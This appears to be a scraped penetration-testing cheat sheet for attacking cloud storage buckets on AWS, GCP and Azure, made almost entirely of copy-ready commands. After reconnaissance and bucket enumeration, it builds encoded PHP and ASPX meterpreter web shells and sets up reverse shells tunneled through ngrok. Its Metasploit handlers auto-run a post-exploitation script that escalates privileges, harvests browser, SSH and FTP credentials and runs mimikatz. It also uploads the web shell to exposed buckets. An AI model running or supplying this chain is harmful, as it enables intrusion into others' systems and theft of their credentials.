Check List
Cheat Sheet
WHOIS Lookup
Domain to IP
Company Info
IP to ASN
Copy whois -h whois.cymru.com -v $TARGET
HTTP Headers
Check Robots
Copy curl $WEBSITE/robots.txt DNS Enum
DNS Records
Subdomain Enum
Subdomains
Copy echo "1.1.1.1" > /tmp/resolvers.txt; \
subfinder -d $WEBSITE -all | \
shuffledns -d $WEBSITE -r /tmp/resolvers.txt -mode resolve Source URLs
GCP
Copy katana -u $WEBSITE -jc -d 5 | grep -Eo "https?://[^ ]+storage\.googleapis\.com[^ ]*" AWS
Copy katana -u $WEBSITE -jc -d 5 | grep -Eo "https?://[^ ]+s3[^ ]+\.amazonaws\.com" Azure
Copy katana -u $WEBSITE -jc -d 5 | grep -Eo "https?://[^ ]+s3[^ ]+\.blob.core.windows\.net" Certificate Transparency
Copy curl -s "https://crt.sh/?q=%25.$WEBSITE&output=json" | jq . GCP
Copy echo $WEBSITE | gau | grep -E "storage\.googleapis\.com|.*\.storage.googleapis.com" AWS
Copy echo $WEBSITE | gau | grep -E "s3\.[a-z0-9-]+\.amazonaws\.com|s3\.amazonaws\.com" Azure
Copy echo $WEBSITE | gau | grep -E "s3\.[a-z0-9-]+\.blob.core.windows\.net|s3\.blob.core.windows\.net" GCP
Copy nmap -p 80,443 \
--script http-title,http-headers $BUCKET.storage.googleapis.com AWS
Copy nmap -p 80,443 \
--script http-title,s3open $BUCKET.s3.amazonaws.com Azure
Copy nmap -p 80,443 \
--script http-title,azure-enum $CONTAINER.blob.core.windows.net
Copy nuclei -u $WEBSITE \
-tags aws gcp azure cloud cloud-Enum aws-cloud-config azure-cloud-config Open Source Intelligence
Copy site:$WEBSITE inurl:"storage.googleapis.com" |
site:$WEBSITE inurl:"googleusercontent.com"
Copy site:$WEBSITE inurl:"amazonaws.com" |
site:s3.amazonaws.com $WEBSITE
Copy site:$WEBSITE inurl:"blob.core.windows.com" |
site:blob.core.windows.com $WEBSITE
Copy shodan search net:"$TARGET/24"
Copy services.http.response.body: {"s3.amazonaws.com", "storage.googleapis.com", "blob.core.windows.net"} GCP
Copy wget https://raw.githubusercontent.com/RhinoSecurityLabs/GCPBucketBrute/refs/heads/master/permutations.txt \
-O /tmp/gcp_buckets.txt
cloudbrute discover \
-d $WEBSITE \
-k "gcp" \
-w /tmp/gcp_buckets.txt AWS
Copy wget https://raw.githubusercontent.com/koaj/aws-s3-bucket-wordlist/refs/heads/master/list.txt \
-O /tmp/s3_bucket_list.txt
cloudbrute discover \
-d $WEBSITE \
-k "s3" \
-w /tmp/s3_bucket_list.txt Azure
Copy wget https://raw.githubusercontent.com/Macmod/goblob/refs/heads/main/wordlists/goblob-folder-names.txt \
-O /tmp/AzureBlob.txt
cloudbrute discover \
-d $WEBSITE \
-k "azure" \
-w /tmp/AzureBlob.txt
Copy nmap -p 80,443 \
--script http-title,http-open-proxy,ssl-cert,http-enum,http-robots.txt,http-auth-finder,s3-buckets,s3-ls,s3-object,s3-enum,s3-brute \
$CONTAINER.blob.core.windows.net \
$BUCKET.storage.googleapis.com \
$BUCKET.s3.amazonaws.com Remote Code Execution
Create Web Shell PHP
Copy weevely generate 00980098 /tmp/unk9vvn.php Create Web Shell ASPX
Copy cp /usr/share/webshells/aspx/cmdasp.aspx /tmp/unk9vvn.aspx Start Ngrok
Copy ngrok tcp 4444 >/dev/null 2>&1 & Define ENV Ngrok
Copy NGINFO=$(curl --silent --show-error http://127.0.0.1:4040/api/tunnels); \
NGHOST=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/([^"]*):.*/\1/p'); \
NGPORT=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/.*.tcp.*.ngrok.io:([^"]*).*/\1/p') Cert Spoof
Copy rm -rf /home/$USER/.msf4/loot/*
msfconsole -qx "
use auxiliary/gather/impersonate_ssl;
set RHOSTS google.com;
run;
exit" Post-EXP
Copy cat > /tmp/post-exp.rc << EOF
getprivs
getsystem
run multi/gather/firefox_creds DECRYPT=true
run multi/gather/filezilla_client_cred
run multi/gather/ssh_creds
run multi/gather/thunderbird_creds
run multi/gather/wlan_geolocate
mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
bg
EOF Generate Web shell PHP
Copy msfvenom -p php/meterpreter/reverse_tcp \
LHOST=$NGHOST \
PORT=$NGPORT \
EnableStageEncoding=true \
-f raw \
-e php/base64 \
-i 3 \
-o /tmp/unk9vvn.php
sed -i "s#eval#<?php eval#g" /tmp/unk9vvn.php
sed -i "s#));#)); ?>#g" /tmp/unk9vvn.php Generate Web Shell ASP
Copy msfvenom -p windows/meterpreter/reverse_winhttps \
LHOST=$NGHOST \
PORT=$NGPORT \
EnableStageEncoding=true \
-f asp > /tmp/unk9vvn.aspx Listening Metasploit PHP
Copy msfconsole -qx "
use multi/handler;
set PAYLOAD php/meterpreter/reverse_tcp;
set LHOST $NGHOST;
set LPORT $NGPORT;
set ReverseListenerBindAddress 127.0.0.1;
set ReverseListenerBindPort 4444;
set StageEncoder true;
set AutoRunScript /tmp/post-exp.rc;
run -j" Listening Metaploit ASP
Copy msfconsole -qx "
use multi/handler;
set PAYLOAD windows/meterpreter/reverse_winhttps;
set LHOST $NGHOST;
set LPORT $NGPORT;
set ReverseListenerBindAddress 127.0.0.1;
set ReverseListenerBindPort 4444;
set StageEncoder true;
set AutoRunScript /tmp/post-exp.rc;
run -j" Connection Test
Copy aws s3 ls s3://$BUCKET.s3.amazonaws.com --no-sign-request Upload File Testing
Copy aws s3 cp /tmp/unk9vvn.php s3://$BUCKET.s3.amazonaws.com --no-sign-request Success Upload File Testing
Copy aws s3 cp s3://$BUCKET.s3.amazonaws.com/unk9vvn.php . --no-sign-request HTTP Connection Testing
Copy curl -I https://$BUCKET.s3.amazonaws.com/unk9vvn.php Connection Test
Copy gsutil ls gs://$BUCKET Upload File Testing
Copy gsutil cp /tmp/unk9vvn.php gs://$BUCKET Success Upload File Testing
Copy gsutil cp gs://$BUCKET/unk9vvn.php . HTTP Connection Testing
Copy curl -I http://storage.googleapis.com/$BUCKET/unk9vvn.php Connection Test
Copy az storage blob list \
--account-name $ACCOUNT \
--container-name $CONTAINER \
--output table Upload File Testing
Copy az storage blob upload \
--account-name $ACCOUNT \
--container-name $CONTAINER \
--name unk9vvn.aspx \
--file /tmp/unk9vvn.aspx \
--auth-mode login Success Upload File Testing
Copy az storage blob download
--account-name $ACCOUNT \
--container-name $CONTAINER \
--name unk9vvn.aspx \
--file /tmp/test_unk9vvn.aspx \
--auth-mode login HTTP Connection Testing
Copy curl -I https://$ACCOUNT.blob.core.windows.net/$CONTAINER/unk9vvn.aspx 